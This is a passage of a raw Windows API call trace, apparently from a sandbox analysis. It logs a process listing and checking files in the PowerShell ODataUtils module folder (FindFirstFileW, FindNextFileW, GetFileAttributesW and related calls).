FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf910 [0226.316] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.316] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.316] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29c8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataAdapter.ps1", cAlternateFileName="")) returned 1 [0226.317] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6194, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psd1", cAlternateFileName="")) returned 1 [0226.317] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psm1", cAlternateFileName="")) returned 1 [0226.317] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcb3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsHelper.ps1", cAlternateFileName="")) returned 1 [0226.317] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataV4Adapter.ps1", cAlternateFileName="")) returned 1 [0226.317] FindNextFileW (in: hFindFile=0x1a5cf910, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.317] FindClose (in: hFindFile=0x1a5cf910 | out: hFindFile=0x1a5cf910) returned 1 [0226.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.318] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe380) returned 1 [0226.318] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", nBufferLength=0x105, lpBuffer=0x1b7fde70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", lpFilePart=0x0) returned 0x58 [0226.318] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\", nBufferLength=0x105, lpBuffer=0x1b7fde10, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\", lpFilePart=0x0) returned 0x59 [0226.318] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\*", lpFindFileData=0x1b7fe020 | out: lpFindFileData=0x1b7fe020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.318] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.318] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9abb71ce, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9abb71ce, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9abb71ce, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2e5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsStrings.psd1", cAlternateFileName="")) returned 1 [0226.318] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9abb71ce, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9abb71ce, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9abb71ce, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2e5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsStrings.psd1", cAlternateFileName="")) returned 0 [0226.318] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe2d0) returned 1 [0226.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe290) returned 1 [0226.319] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe380) returned 1 [0226.319] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", nBufferLength=0x105, lpBuffer=0x1b7fde70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", lpFilePart=0x0) returned 0x58 [0226.319] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\", nBufferLength=0x105, lpBuffer=0x1b7fde10, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\", lpFilePart=0x0) returned 0x59 [0226.319] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\*", lpFindFileData=0x1b7fe020 | out: lpFindFileData=0x1b7fe020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf790 [0226.319] FindNextFileW (in: hFindFile=0x1a5cf790, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.319] FindNextFileW (in: hFindFile=0x1a5cf790, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9abb71ce, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9abb71ce, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9abb71ce, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2e5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsStrings.psd1", cAlternateFileName="")) returned 1 [0226.320] FindNextFileW (in: hFindFile=0x1a5cf790, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.320] FindClose (in: hFindFile=0x1a5cf790 | out: hFindFile=0x1a5cf790) returned 1 [0226.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe2d0) returned 1 [0226.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe290) returned 1 [0226.320] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", nBufferLength=0x105, lpBuffer=0x1b7fdf70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", lpFilePart=0x0) returned 0x58 [0226.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe3b0) returned 1 [0226.320] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe490 | out: lpFileInformation=0x1b7fe490*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0226.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe370) returned 1 [0226.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe3e0) returned 1 [0226.320] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", nBufferLength=0x105, lpBuffer=0x1b7fded0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", lpFilePart=0x0) returned 0x58 [0226.320] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\", nBufferLength=0x105, lpBuffer=0x1b7fde70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\", lpFilePart=0x0) returned 0x59 [0226.320] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\*", lpFindFileData=0x1b7fe080 | out: lpFindFileData=0x1b7fe080*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf730 [0226.321] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.321] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9abb71ce, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9abb71ce, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9abb71ce, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2e5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsStrings.psd1", cAlternateFileName="")) returned 1 [0226.321] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9abb71ce, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9abb71ce, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9abb71ce, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2e5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsStrings.psd1", cAlternateFileName="")) returned 0 [0226.321] FindClose (in: hFindFile=0x1a5cf730 | out: hFindFile=0x1a5cf730) returned 1 [0226.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe330) returned 1 [0226.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe2f0) returned 1 [0226.321] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\en-US.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\en-us.psd1")) returned 0xffffffff [0226.322] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\en-US.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\en-us.psm1")) returned 0xffffffff [0226.322] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\en-US.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\en-us.cdxml")) returned 0xffffffff [0226.322] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\en-US.xaml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\en-us.xaml")) returned 0xffffffff [0226.322] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\en-US.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\en-us.dll")) returned 0xffffffff [0226.322] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52 [0226.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.322] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0226.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.323] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52 [0226.323] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\", lpFilePart=0x0) returned 0x53 [0226.323] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.323] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.323] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.324] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29c8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataAdapter.ps1", cAlternateFileName="")) returned 1 [0226.324] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6194, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psd1", cAlternateFileName="")) returned 1 [0226.324] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psm1", cAlternateFileName="")) returned 1 [0226.324] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcb3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsHelper.ps1", cAlternateFileName="")) returned 1 [0226.325] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataV4Adapter.ps1", cAlternateFileName="")) returned 1 [0226.325] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataV4Adapter.ps1", cAlternateFileName="")) returned 0 [0226.325] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.325] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: 